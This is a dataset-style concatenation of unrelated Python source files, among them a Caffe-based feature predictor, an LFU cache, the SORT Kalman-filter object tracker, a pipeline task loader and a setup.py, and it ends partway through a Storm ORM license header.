batch_size = len(inputs[0])
for input_ in inputs[1:]:
if input_ is None:
continue
assert batch_size == len(input_)
else:
batch_size = 1
inputs = list(inputs)
for i, input_ in enumerate(inputs):
if input_ is None:
continue
inputs[i] = input_[None, :]
inputs = tuple(inputs)
prediction_name = kwargs.get('prediction_name') or self.prediction_name
if self.batch_size != 1 and batch_size == 1:
for input_ in self.inputs:
blob = self.blob(input_)
blob.reshape(1, *blob.shape[1:])
self.reshape()
outs = self.forward_all(blobs=[prediction_name], end=prediction_name, **dict(zip(self.inputs, inputs)))
if self.batch_size != 1 and batch_size == 1:
for input_ in self.inputs:
blob = self.blob(input_)
blob.reshape(self.batch_size, *blob.shape[1:])
self.reshape()
predictions = outs[prediction_name]
if batch:
return predictions
else:
return np.squeeze(predictions, axis=0)
def jacobian(self, wrt_input_name, *inputs):
assert wrt_input_name in self.inputs
batch = len(self.blob(self.inputs[0]).data.shape) == len(inputs[0].shape)
wrt_input_shape = self.blob(wrt_input_name).data.shape
if batch:
batch_size = len(inputs[0])
for input_ in inputs[1:]:
if input_ is None:
continue
assert batch_size == len(input_)
else:
batch_size = 1
inputs = list(inputs)
for i, input_ in enumerate(inputs):
if input_ is None:
continue
inputs[i] = input_[None, :]
inputs = tuple(inputs)
_, wrt_input_dim = wrt_input_shape
inputs = list(inputs)
# use inputs with zeros for the inputs that are not specified
for i, (input_name, input_) in enumerate(zip(self.inputs, inputs)):
if input_ is None:
inputs[i] = np.zeros(self.blob(input_name).shape)
        # use outputs with zeros for the outputs that don't affect the backward computation
output_diffs = dict()
for output_name in self.outputs:
if output_name == self.prediction_name:
output_diffs[output_name] = np.eye(self.prediction_dim)
else:
output_diffs[output_name] = np.zeros((self.prediction_dim,) + self.blob(output_name).diff.shape[1:])
jacs = np.empty((batch_size, self.prediction_dim, wrt_input_dim))
for k, input_ in enumerate(zip(*inputs)):
input_blobs = dict(zip(self.inputs, [np.repeat(in_[None, :], self.batch_size, axis=0) for in_ in input_]))
self.forward_all(blobs=[self.prediction_name], end=self.prediction_name, **input_blobs)
diffs = self.backward_all(diffs=[self.prediction_name], start=self.prediction_name, **output_diffs)
jacs[k, :, :] = diffs[wrt_input_name]
if batch:
return jacs
else:
return np.squeeze(jacs, axis=0)
def blob(self, blob_name):
return self._blobs[list(self._blob_names).index(blob_name)]
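# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# CaffeNetPredictor wraps caffe.Net: predict() accepts a single sample or a
# batch for each declared input and returns the blob named by prediction_name,
# while jacobian() differentiates that blob with respect to one input. The
# prototxt/caffemodel names, input arrays and blob names below are placeholders.
#
#   net = CaffeNetPredictor('deploy.prototxt', 'weights.caffemodel',
#                           prediction_name='y_diff_pred')
#   y_dot = net.predict(image, action)
#   jac = net.jacobian('u', image, action)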
class CaffeNetFeaturePredictor(CaffeNetPredictor, predictor.FeaturePredictor):
"""
Predicts change in features (y_dot) given the current input image (x) and control (u):
x, u -> y_dot
"""
def __init__(self, net_func, input_shapes, input_names=None, output_names=None, pretrained_file=None, postfix='', batch_size=32):
"""
Assumes that outputs[0] is the prediction_name
        batch_size_1: if True, another net with batch_size of 1 is created, and that net is used for computing forward in the predict method
"""
predictor.FeaturePredictor.__init__(self, *input_shapes, input_names=input_names, output_names=output_names, backend='caffe')
self.net_func = net_func
self.postfix = postfix
self.batch_size = batch_size
self.deploy_net_param, weight_fillers = net_func(input_shapes, batch_size=batch_size)
self.deploy_net_param = net_caffe.deploy_net(self.deploy_net_param, self.input_names, input_shapes, self.output_names, batch_size=batch_size)
self.net_name = str(self.deploy_net_param.name)
deploy_fname = self.get_model_fname('deploy')
with open(deploy_fname, 'w') as f:
f.write(str(self.deploy_net_param))
copy_weights_later = False
if pretrained_file is not None:
if type(pretrained_file) == list:
snapshot_prefix = self.get_snapshot_prefix()
snapshot_prefix.split('_')
this_levels = [token for token in snapshot_prefix.split('_') if token.startswith('levels')][0]
pretrained_levels = pretrained_file[0]
snapshot_prefix = '_'.join([pretrained_levels if token.startswith('levels') else token for token in snapshot_prefix.split('_')])
pretrained_file = snapshot_prefix + '_iter_' + pretrained_file[-1] + '.caffemodel'
if this_levels != pretrained_levels:
copy_weights_later = True
if not copy_weights_later and not pretrained_file.endswith('.caffemodel'):
pretrained_file = self.get_snapshot_prefix() + '_iter_' + pretrained_file + '.caffemodel'
CaffeNetPredictor.__init__(self, deploy_fname, pretrained_file=pretrained_file if not copy_weights_later else None, prediction_name=self.output_names[0])
if copy_weights_later:
deploy_fname = '_'.join([pretrained_levels if token.startswith('levels') else token for token in deploy_fname.split('_')])
pretrained_net = caffe.Net(deploy_fname, pretrained_file, caffe.TEST)
for param_name, param in self.params.items():
if param_name in pretrained_net.params:
for blob, pretrained_blob in zip(param, pretrained_net.params[param_name]):
if pretrained_blob.data.shape == blob.data.shape:
blob.data[...] = pretrained_blob.data
else:
blob.data[-pretrained_blob.data.shape[0]:, ...] = pretrained_blob.data # copy for second slice because of the concat layer
blob.data[:-pretrained_blob.data.shape[0], ...] *= 0.0
self.output_names = [name for name in self.output_names if name in self.blobs]
self.set_weight_fillers(self.params, weight_fillers)
self.train_net = None
self.val_net = None
def train(self, train_hdf5_fname, val_hdf5_fname=None, solverstate_fname=None, solver_param=None, batch_size=32, visualize_response_maps=False):
hdf5_txt_fnames = []
for hdf5_fname in [train_hdf5_fname, val_hdf5_fname]:
if hdf5_fname is not None:
head, tail = os.path.split(hdf5_fname)
root, _ = os.path.splitext(tail)
hdf5_txt_fname = os.path.join(head, '.' + root + '.txt')
if not os.path.isfile(hdf5_txt_fname):
with open(hdf5_txt_fname, 'w') as f:
f.write(hdf5_fname + '\n')
hdf5_txt_fnames.append(hdf5_txt_fname)
else:
hdf5_txt_fnames.append(None)
train_hdf5_txt_fname, val_hdf5_txt_fname = hdf5_txt_fnames
input_shapes = (self.x_shape, self.u_shape)
train_net_param, weight_fillers = self.net_func(input_shapes, train_hdf5_txt_fname, batch_size, self.net_name, phase=caffe.TRAIN)
if val_hdf5_fname is not None:
val_net_param, _ = self.net_func(input_shapes, val_hdf5_txt_fname, batch_size, self.net_name, phase=caffe.TEST)
self.train_val_net_param = train_net_param
if val_hdf5_fname is not None:
layers = [layer for layer in self.train_val_net_param.layer]
# remove layers except for data layers
for layer in layers:
if 'Data' not in layer.type:
self.train_val_net_param.layer.remove(layer)
# add data layers from validation net_caffe
self.train_val_net_param.layer.extend([layer for layer in val_net_param.layer if 'Data' in layer.type])
# add back the layers that are not data layers
self.train_val_net_param.layer.extend([layer for layer in layers if 'Data' not in layer.type])
self.train_val_net_param = net_caffe.train_val_net(self.train_val_net_param)
train_val_fname = self.get_model_fname('train_val')
with open(train_val_fname, 'w') as f:
f.write(str(self.train_val_net_param))
if solver_param is None:
solver_param = pb2.SolverParameter()
self.add_default_parameters(solver_param, val_net=val_hdf5_fname is not None)
solver_fname = self.get_model_fname('solver')
with open(solver_fname, 'w') as f:
f.write(str(solver_param))
solver = caffe.get_solver(solver_fname)
self.set_weight_fillers(solver.net.params, weight_fillers)
for param_name, param in self.params.items():
for blob, solver_blob in zip(param, solver.net.params[param_name]):
solver_blob.data[...] = blob.data
if solverstate_fname is not None:
if not solverstate_fname.endswith('.solverstate'):
solverstate_fname = self.get_snapshot_prefix() + '_iter_' + solverstate_fname + '.solverstate'
solver.restore(solverstate_fname)
self.solve(solver, solver_param, visualize_response_maps=visualize_response_maps)
for param_name, param in self.params.items():
for blob, solver_blob in zip(param, solver.net.params[param_name]):
blob.data[...] = solver_blob.data
self.train_net = solver.net
if val_hdf5_fname is not None:
self.val_net = solver.test_nets[0]
def solve(self, solver, solver_param, visualize_response_maps=False):
# load losses for visualization
iters, losses, val_losses = self.restore_losses(curr_iter=solver.iter, num_test_nets=len(solver.test_nets))
# solver loop
for iter_ in range(solver.iter, solver_param.max_iter):
solver.step(1)
if iter_ % solver_param.display == 0:
iters.append(iter_)
# visualize response maps of first image in batch
if visualize_response_maps:
image_curr = solver.net.blobs['image_curr'].data[0].copy()
vel = solver.net.blobs['vel'].data[0].copy()
image_diff = solver.net.blobs['image_diff'].data[0].copy()
self.visualize_response_maps(image_curr, vel, x_next=image_curr+image_diff)
# training loss
loss = 0.0
for blob_name, loss_weight in solver.net.blob_loss_weights.items():
if loss_weight:
loss += loss_weight * solver.net.blobs[blob_name].data
losses.append(loss)
# validation loss
test_losses = []
for test_net, test_iter, test_losses in zip(solver.test_nets, solver_param.test_iter, val_losses):
test_scores = {}
for i in range(test_iter):
output_blobs = test_net.forward()
for blob_name, blob_data in output_blobs.items():
if i == 0:
test_scores[blob_name] = blob_data.copy()
else:
test_scores[blob_name] += blob_data
test_loss = 0.0
for blob_name, score in test_scores.items():
loss_weight = test_net.blob_loss_weights[blob_name]
mean_score = score / test_iter
if loss_weight:
test_loss += loss_weight * mean_score
test_losses.append(test_loss)
# save losses and visualize them
self.save_losses(iters, losses, val_losses)
def predict(self, *inputs, **kwargs):
if 'prediction_name' in kwargs and kwargs['prediction_name'] not in self.blobs:
kwargs['prediction_name'] = kwargs['prediction_name'].replace('image', 'x0')
return super(CaffeNetFeaturePredictor, self).predict(*inputs, **kwargs)
def jacobian_control(self, X, U):
return self.jacobian(self.inputs[1], X, U), self.feature_from_input(X)
def feature_from_input(self, X, input_name='image_curr', output_name='y'):
assert X.shape == self.x_shape or X.shape[1:] == self.x_shape
batch = X.shape != self.x_shape
if not batch:
X = X[None, :]
batch_size = len(X)
input_blobs = dict()
for input_ in self.inputs:
if input_ == input_name:
input_blobs[input_] = X
else:
input_blobs[input_] = np.zeros((batch_size,) + self.blob(input_).data.shape[1:])
outs = self.forward_all(blobs=[output_name], end=output_name, **input_blobs)
Y = outs[output_name]
if not batch:
Y = np.squeeze(Y, axis=0)
return Y
def preprocess_input(self, X):
if 'x0' in self.blobs:
return self.feature_from_input(X, output_name='x0')
else:
return X
def add_default_parameters(self, solver_param, val_net=True):
if not solver_param.train_net:
train_val_fname = self.get_model_fname('train_val')
solver_param.train_net = train_val_fname
if val_net:
if not solver_param.test_net:
train_val_fname = self.get_model_fname('train_val')
solver_param.test_net.append(train_val_fname)
if not solver_param.test_iter:
solver_param.test_iter.append(10)
else:
del solver_param.test_net[:]
del solver_param.test_iter[:]
if not solver_param.solver_type: solver_param.solver_type = pb2.SolverParameter.SGD
if not solver_param.test_interval: solver_param.test_interval = 1000
if not solver_param.base_lr: solver_param.base_lr = 0.05
if not solver_param.lr_policy: solver_param.lr_policy = "step"
if not solver_param.gamma: solver_param.gamma = 0.9
if not solver_param.stepsize: solver_param.stepsize = 1000
if not solver_param.display: solver_param.display = 20
if not solver_param.max_iter: solver_param.max_iter = 10000
if not solver_param.momentum: solver_param.momentum = 0.9
if not solver_param.momentum2: solver_param.momentum2 = 0.999
if not solver_param.weight_decay: solver_param.weight_decay = 0.0005
if not solver_param.snapshot: solver_param.snapshot = 1000
if not solver_param.snapshot_prefix:
snapshot_prefix = self.get_snapshot_prefix()
solver_param.snapshot_prefix = snapshot_prefix
# don't change solver_param.solver_mode
@staticmethod
def set_weight_fillers(params, weight_fillers):
if weight_fillers:
for param_name, fillers in weight_fillers.items():
param = params.get(param_name)
if param:
for blob, filler in zip(param, fillers):
blob.data[...] = filler
def get_model_fname(self, phase):
model_dir = self.get_model_dir()
fname = os.path.join(model_dir, phase + '.prototxt')
return fname
class BilinearNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, input_shapes, **kwargs):
super(BilinearNetFeaturePredictor, self).__init__(net_caffe.bilinear_net, input_shapes, **kwargs)
def jacobian_control(self, X, U):
if X.shape == self.x_shape:
y = self.feature_from_input(X)
y_dim, = y.shape
            A = list(self.params.values())[0][0].data.reshape((y_dim, y_dim, -1))
            B = list(self.params.values())[1][0].data
jac = np.einsum("kij,i->kj", A, y) + B
return jac, y
else:
jac, y = zip(*[self.jacobian_control(x, None) for x in X])
jac = np.asarray(jac)
y = np.asarray(y)
return jac, y
class FcnActionCondEncoderNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, *args, **kwargs):
super(FcnActionCondEncoderNetFeaturePredictor, self).__init__(*args, **kwargs)
self._xlevel_shapes = None
def mean_feature_from_input(self, X):
if X.shape == self.x_shape:
levels = []
for key in self.blobs.keys():
                match = re.match(r'bilinear(\d+)_re_y$', key)
if match:
assert len(match.groups()) == 1
levels.append(int(match.group(1)))
levels = sorted(levels)
zlevels = []
for level in levels:
output_name = 'x%d'%level
if output_name == 'x0' and output_name not in self.blobs:
xlevel = X
else:
xlevel = self.feature_from_input(X, output_name=output_name)
zlevel = np.asarray([channel.mean() for channel in xlevel])
zlevels.append(zlevel)
z = np.concatenate(zlevels)
return z
else:
return np.asarray([self.mean_feature_from_input(x) for x in X])
def response_maps_from_input(self, x):
assert x.shape == self.x_shape
is_first_time = self._xlevel_shapes is None
if is_first_time:
levels = []
for key in self.blobs.keys():
                match = re.match(r'bilinear(\d+)_re_y$', key)
if match:
assert len(match.groups()) == 1
levels.append(int(match.group(1)))
levels = sorted(levels)
xlevels_first = OrderedDict()
self._xlevel_shapes = OrderedDict()
for level in levels:
output_name = 'x%d'%level
if output_name == 'x0' and output_name not in self.blobs:
xlevel = x
else:
xlevel = self.feature_from_input(x, output_name=output_name)
xlevels_first[output_name] = xlevel
self._xlevel_shapes[output_name] = xlevel.shape
y = self.feature_from_input(x)
xlevels = OrderedDict()
y_index = 0
for output_name, shape in self._xlevel_shapes.items():
xlevels[output_name] = y[y_index:y_index+np.prod(shape)].reshape(shape)
y_index += np.prod(shape)
if is_first_time:
for xlevel, xlevel_first in zip(xlevels.values(), xlevels_first.values()):
assert np.allclose(xlevel_first, xlevel)
return xlevels
def jacobian_control(self, X, U):
if X.shape == self.x_shape:
xlevels = self.response_maps_from_input(X)
jaclevels = []
ylevels = []
for output_name, xlevel in xlevels.items():
level = int(output_name[1:])
xlevel_c_dim = xlevel.shape[0]
y_dim = np.prod(xlevel.shape[1:])
u_dim, = self.u_shape
if 'bilinear%d_bilinear_yu'%level in self.params: # shared weights
A = self.params['bilinear%d_bilinear_yu'%level][0].data.reshape((y_dim, u_dim, y_dim))
jaclevel = np.einsum("kji,ci->ckj", A, xlevel.reshape((xlevel_c_dim, y_dim)))
else:
A = np.asarray([self.params['bilinear%d_bilinear_yu_%d'%(level, channel)][0].data for channel in range(xlevel_c_dim)]).reshape((xlevel_c_dim, y_dim, u_dim, y_dim))
jaclevel = np.einsum("ckji,ci->ckj", A, xlevel.reshape((xlevel_c_dim, y_dim)))
if 'bilinear%d_linear_u'%level in self.params: # shared weights
B = self.params['bilinear%d_linear_u'%level][0].data
c = self.params['bilinear%d_linear_u'%level][1].data
else:
B = np.asarray([self.params['bilinear%d_linear_u_%d'%(level, channel)][0].data for channel in range(xlevel_c_dim)])
c = np.asarray([self.params['bilinear%d_linear_u_%d'%(level, channel)][1].data for channel in range(xlevel_c_dim)])
jaclevel += B + c[..., None]
jaclevel = jaclevel.reshape(xlevel_c_dim * y_dim, u_dim)
jaclevels.append(jaclevel)
ylevels.append(xlevel.flatten())
jac = np.concatenate(jaclevels)
y = np.concatenate(ylevels)
return jac, y
else:
jac, y = zip(*[self.jacobian_control(x, None) for x in X])
jac = np.asarray(jac)
y = np.asarray(y)
return jac, y
class EnsembleNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, predictors):
self.predictors = predictors
# use name of first predictor
self.net_name = 'ensemble_' + self.predictors[0].net_name
self.postfix = 'ensemble_' + self.predictors[0].postfix
def predict(self, *inputs, **kwargs):
predictions = []
for predictor in self.predictors:
prediction = predictor.predict(*inputs, **kwargs)
predictions.append(prediction)
predictions = np.concatenate(predictions, axis=1)
return predictions
def preprocess_input(self, X):
outs = []
for predictor in self.predictors:
out = predictor.preprocess_input(X)
outs.append(out)
outs = np.concatenate(outs, axis=1)
return outs
def mean_feature_from_input(self, X):
zs = []
for predictor in self.predictors:
z = predictor.mean_feature_from_input(X)
zs.append(z)
zs = np.concatenate(zs)
return zs
def feature_from_input(self, x):
ys = []
for predictor in self.predictors:
y = predictor.feature_from_input(x)
ys.append(y)
ys = np.concatenate(ys)
return ys
def response_maps_from_input(self, x):
xlevels = OrderedDict()
for i, predictor in enumerate(self.predictors):
predictor_xlevels = predictor.response_maps_from_input(x)
            for output_name, xlevel in predictor_xlevels.items():
if output_name == 'x0' and output_name not in xlevels:
xlevels[output_name] = xlevel
else:
xlevels[output_name + '_%d'%i] = xlevel
return xlevels
def jacobian_control(self, X, U):
jacs = []
ys = []
for predictor in self.predictors:
jac, y = predictor.jacobian_control(X, U)
jacs.append(jac)
ys.append(y)
jacs = np.concatenate(jacs, axis=0)
ys = np.concatenate(ys, axis=0)
return jacs, ys
def train(self, *args, **kwargs):
raise NotImplementedError
|
StarcoderdataPython
|
11257994
|
import collections
class Node:
def __init__(self, key, val):
self.key = key
self.val = val
self.freq = 1
self.next = None
self.pre = None
class Dll:
def __init__(self):
self.head = Node(-1,-1)
self.tail = Node(-1,-1)
self.head.next = self.tail
self.tail.pre = self.head
self.count = 0
def insertToHead(self, node):
node.pre = self.head
node.next = self.head.next
self.head.next.pre = node
self.head.next = node
self.count += 1
def remove(self, node):
pre, nxt = node.pre, node.next
pre.next = nxt
nxt.pre = pre
self.count -= 1
def removeLast(self):
if self.count == 0:
return
last = self.tail.pre
self.remove(last)
return last
class LFUCache:
def __init__(self, capacity: int):
self.size = 0
self.cap = capacity
self.dic = {}
self.freq_dic = collections.defaultdict(Dll)
self.min_freq = 0
def update(self, node):
freq = node.freq
self.freq_dic[freq].remove(node)
if self.min_freq == freq and self.freq_dic[freq].count == 0:
self.min_freq += 1
node.freq += 1
self.freq_dic[node.freq].insertToHead(node)
def get(self, key: int) -> int:
if key in self.dic:
node = self.dic[key]
self.update(node)
return node.val
return -1
def put(self, key: int, value: int) -> None:
if self.cap == 0:
return
if key not in self.dic:
if self.size == self.cap:
node = self.freq_dic[self.min_freq].removeLast()
del self.dic[node.key]
self.size -= 1
node = Node(key, value)
self.dic[key] = node
self.freq_dic[1].insertToHead(node)
self.min_freq = 1
self.size += 1
else:
node = self.dic[key]
self.update(node)
node.val = value
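# --- Added usage sketch (not part of the original solution) ---
# A minimal check of the LFU semantics above, assuming the LeetCode 460
# contract: with capacity 2, get(1) raises key 1's frequency, so put(3, 3)
# evicts key 2, the least frequently used entry.
if __name__ == "__main__":
    cache = LFUCache(2)
    cache.put(1, 1)
    cache.put(2, 2)
    print(cache.get(1))  # 1 (key 1 now has frequency 2)
    cache.put(3, 3)      # evicts key 2
    print(cache.get(2))  # -1
    print(cache.get(3))  # 3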
|
StarcoderdataPython
|
143504
|
<filename>chapter10/sort.py
"""
SORT: A Simple, Online and Realtime Tracker
Copyright (C) 2016 <NAME> <EMAIL>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
from scipy.optimize import linear_sum_assignment
from typing import Tuple
import cv2
def convert_bbox_to_z(bbox):
"""
Takes a bounding box in the form [x1,y1,x2,y2] and returns z in the form
[x,y,s,r] where x,y is the centre of the box and s is the scale/area and r is
the aspect ratio
"""
w, h = bbox[2:4] - bbox[0:2]
x, y = (bbox[0:2] + bbox[2:4]) / 2
s = w * h # scale is just area
r = w / h
return np.array([x, y, s, r])[:, None].astype(np.float64)
def convert_x_to_bbox(x):
"""
Takes a bounding box in the centre form [x,y,s,r] and returns it in the form
[x1,y1,x2,y2] where x1,y1 is the top left and x2,y2 is the bottom right
"""
# Shape of x is (7, 1)
x = x[:, 0]
center = x[0:2]
w = np.sqrt(x[2] * x[3])
h = x[2] / w
half_size = np.array([w, h]) / 2
bbox = np.concatenate((center - half_size, center + half_size))
return bbox.astype(np.float64)
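# Worked round trip (illustrative note, not part of the original file): the box
# [10, 10, 50, 30] has width 40 and height 20, so convert_bbox_to_z maps it to
# centre (30, 20), scale s = 800 and ratio r = 2; stacking three zero velocities
# onto that column vector and passing it to convert_x_to_bbox recovers
# [10., 10., 50., 30.].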
class KalmanBoxTracker:
"""
    This class represents the internal state of individual tracked objects observed as bbox.
"""
def __init__(self, bbox, label):
self.id = label
self.time_since_update = 0
self.hit_streak = 0
self.kf = cv2.KalmanFilter(dynamParams=7, measureParams=4, type=cv2.CV_64F)
# define constant velocity model
self.kf.transitionMatrix = np.array(
[[1, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=np.float64)
self.kf.processNoiseCov = np.diag([10, 10, 10, 10, 1e4, 1e4, 1e4]).astype(np.float64)
        # We only observe the first four state components (x, y, s, r), not the velocities
self.kf.measurementMatrix = np.array(
[[1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], dtype=np.float64)
self.kf.measurementNoiseCov = np.diag([1, 1, 10, 10]).astype(np.float64)
        # Start the filter state at the initial bounding box with zero velocities.
self.kf.statePost = np.vstack((convert_bbox_to_z(bbox), [[0], [0], [0]]))
self.kf.errorCovPost = np.diag([1, 1, 1, 1, 1e-2, 1e-2, 1e-4]).astype(np.float64)
def update(self, bbox):
"""
Updates the state vector with observed bbox.
"""
self.time_since_update = 0
self.hit_streak += 1
self.kf.correct(convert_bbox_to_z(bbox))
def predict(self):
"""
Advances the state vector and returns the predicted bounding box estimate.
"""
if self.time_since_update > 0:
self.hit_streak = 0
self.time_since_update += 1
retval = self.kf.predict()
return convert_x_to_bbox(retval)
@property
def current_state(self):
"""
Returns the current bounding box estimate.
"""
return convert_x_to_bbox(self.kf.statePost)
def iou(a: np.ndarray, b: np.ndarray) -> float:
"""
    Computes IoU between two bboxes in the form [x1,y1,x2,y2]
"""
a_tl, a_br = a[:4].reshape((2, 2))
b_tl, b_br = b[:4].reshape((2, 2))
int_tl = np.maximum(a_tl, b_tl)
int_br = np.minimum(a_br, b_br)
int_area = np.product(np.maximum(0., int_br - int_tl))
a_area = np.product(a_br - a_tl)
b_area = np.product(b_br - b_tl)
return int_area / (a_area + b_area - int_area)
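# Worked example (illustrative note, not part of the original file): two unit
# squares offset by half a side, a = [0, 0, 1, 1] and b = [0.5, 0, 1.5, 1],
# intersect in a 0.5 x 1.0 region, so iou(a, b) = 0.5 / (1 + 1 - 0.5) = 1/3.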
def associate_detections_to_trackers(detections: np.ndarray, trackers: np.ndarray,
iou_threshold: float = 0.3) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Assigns detections to tracked object (both represented as bounding boxes)
Returns 3 lists of matches, unmatched_detections and unmatched_trackers
"""
iou_matrix = np.zeros((len(detections), len(trackers)), dtype=np.float64)
for d, det in enumerate(detections):
for t, trk in enumerate(trackers):
iou_matrix[d, t] = iou(det, trk)
row_ind, col_ind = linear_sum_assignment(-iou_matrix)
matched_indices = np.transpose(np.array([row_ind, col_ind]))
iou_values = np.array([iou_matrix[detection, tracker]
for detection, tracker in matched_indices])
    good_matches = matched_indices[iou_values > iou_threshold]
unmatched_detections = np.array(
[i for i in range(len(detections)) if i not in good_matches[:, 0]])
unmatched_trackers = np.array(
[i for i in range(len(trackers)) if i not in good_matches[:, 1]])
return good_matches, unmatched_detections, unmatched_trackers
class Sort:
def __init__(self, max_age=10, min_hits=6):
"""
Sets key parameters for SORT
"""
self.max_age = max_age
self.min_hits = min_hits
self.trackers = []
self.count = 0
def next_id(self):
self.count += 1
return self.count
def update(self, dets):
"""
Params:
dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]
Requires: this method must be called once for each frame even with empty detections.
        Returns a similar array, where the last column is the object ID.
NOTE: The number of objects returned may differ from the number of detections provided.
"""
        # Predict new locations and remove trackers with NaNs.
self.trackers = [
tracker for tracker in self.trackers if not np.any(
np.isnan(
tracker.predict()))]
# get predicted locations
trks = np.array([tracker.current_state for tracker in self.trackers])
matched, unmatched_dets, unmatched_trks = associate_detections_to_trackers(
dets, trks)
# update matched trackers with assigned detections
for detection_num, tracker_num in matched:
self.trackers[tracker_num].update(dets[detection_num])
# create and initialise new trackers for unmatched detections
for i in unmatched_dets:
self.trackers.append(KalmanBoxTracker(dets[i, :], self.next_id()))
ret = np.array([np.concatenate((trk.current_state, [trk.id + 1]))
for trk in self.trackers
if trk.time_since_update < 1 and trk.hit_streak >= self.min_hits])
# remove dead tracklet
self.trackers = [
tracker for tracker in self.trackers if tracker.time_since_update <= self.max_age]
return ret
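# --- Added usage sketch (an assumption, not part of the original file) ---
# Typical driving loop: call update() once per frame with an (N, 5) array of
# [x1, y1, x2, y2, score] detections and read back [x1, y1, x2, y2, track_id]
# rows for confirmed tracks. The detection values below are made up purely
# for illustration.
if __name__ == "__main__":
    tracker = Sort(max_age=10, min_hits=1)
    frames = [
        np.array([[10., 10., 50., 50., 0.9]]),
        np.array([[12., 11., 52., 51., 0.8]]),
    ]
    for dets in frames:
        tracks = tracker.update(dets)
        print(tracks)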
|
StarcoderdataPython
|
232988
|
<reponame>ShayHa/CodingInterviewSolution
"""
The trick here is that I am using the new_ls parameter as the list to append to.
Since the default list is created only once, when the function is defined, the
same object is shared by every call that does not pass its own list.
"""
def rc(ls, new_ls=[]):
for x in ls:
if isinstance(x, list):
rc(x, new_ls)
else:
new_ls.append(x)
return new_ls
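# Added illustration (a sketch, not part of the original snippet): because the
# default list is shared, a second top-level call keeps appending to the result
# of the first one unless a fresh list is passed explicitly.
if __name__ == "__main__":
    print(rc([1, [2, [3]]]))       # [1, 2, 3]
    print(rc([4, 5]))              # [1, 2, 3, 4, 5] -- default list was reused
    print(rc([6], new_ls=[]))      # [6] -- passing a new list avoids the reuse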
|
StarcoderdataPython
|
264580
|
<gh_stars>1-10
import copy
from pathlib import Path
import jinja2
from pipeline._yaml import read_yaml
from pipeline.exceptions import DuplicatedTaskError
def process_tasks(config):
user_defined_tasks = _collect_user_defined_tasks(config)
tasks = _add_default_output_path(user_defined_tasks, config)
tasks = _replace_task_dependencies_with_task_outputs(tasks)
return tasks
def replace_missing_templates_with_correct_paths(tasks, missing_templates):
for id_ in tasks:
if tasks[id_]["template"] in missing_templates:
tasks[id_]["template"] = missing_templates[tasks[id_]["template"]]
return tasks
def _collect_user_defined_tasks(config):
"""Collect the tasks.
Search recursively through the directories inside the project root and collect
.yamls
"""
task_files = list(Path(config["source_directory"]).glob("**/*.yaml"))
tasks = {}
for path in task_files:
try:
template = jinja2.Template(path.read_text())
except jinja2.exceptions.TemplateSyntaxError as e:
message = (
f"\n\nAn error happened while rendering the task template {path}. "
"This happens because a jinja2 variable within the template is not "
"defined, misspelled, etc.."
)
raise Exception(message) from e
rendered_template = template.render(**config)
tasks_in_file = read_yaml(rendered_template)
if tasks_in_file:
# Add config location to task_info.
for id_ in tasks_in_file:
tasks_in_file[id_]["config"] = path.as_posix()
duplicated_ids = set(tasks_in_file) & set(tasks)
if duplicated_ids:
raise DuplicatedTaskError(duplicated_ids)
tasks.update(tasks_in_file)
return tasks
def _add_default_output_path(user_defined_tasks, config):
user_defined_tasks = copy.deepcopy(user_defined_tasks)
generated_tasks = {}
for id_, task_info in user_defined_tasks.items():
if "produces" not in task_info:
task_info["produces"] = f"{config['hidden_build_directory']}/{id_}"
generated_tasks.update({id_: task_info})
return generated_tasks
def _replace_task_dependencies_with_task_outputs(tasks):
"""Replace a task dependency with the output of the task.
Since users are allowed to reference tasks as dependencies, we need to replace tasks
with the outputs of the task to form the workflow.
"""
for task_info in tasks.values():
depends_on = task_info.get("depends_on", [])
if isinstance(depends_on, list):
for i, dependency in enumerate(depends_on):
if dependency in tasks:
task_info["depends_on"][i] = tasks[dependency]["produces"]
else:
if depends_on in tasks:
task_info["depends_on"] = tasks[depends_on]["produces"]
return tasks
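# --- Added sketch (not part of the original module) ---
# Illustration of _replace_task_dependencies_with_task_outputs: a dependency
# that names another task id is swapped for that task's "produces" path, so the
# workflow can be wired purely from file paths. Task names and paths here are
# made up for illustration only.
if __name__ == "__main__":
    example_tasks = {
        "clean_data": {"produces": "bld/clean.csv", "depends_on": ["src/raw.csv"]},
        "fit_model": {"produces": "bld/model.pkl", "depends_on": ["clean_data"]},
    }
    resolved = _replace_task_dependencies_with_task_outputs(example_tasks)
    print(resolved["fit_model"]["depends_on"])  # ['bld/clean.csv']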
|
StarcoderdataPython
|
11643
|
import setuptools
setuptools.setup(
name="qualityforward",
version="1.1",
author="<NAME>",
author_email="<EMAIL>",
description="Python library for QualityForward API",
long_description="This is python library for QualityForward API. QualityForward is cloud based test management service.",
long_description_content_type="text/markdown",
url="https://cloud.veriserve.co.jp/",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
]
)
|
StarcoderdataPython
|
11397438
|
#
# Copyright (c) 2006, 2007 Canonical
#
# Written by <NAME> <<EMAIL>>
#
# This file is part of Storm Object Relational Mapper.
#
# Storm is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of
# the License, or (at your option) any later version.
#
# Storm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
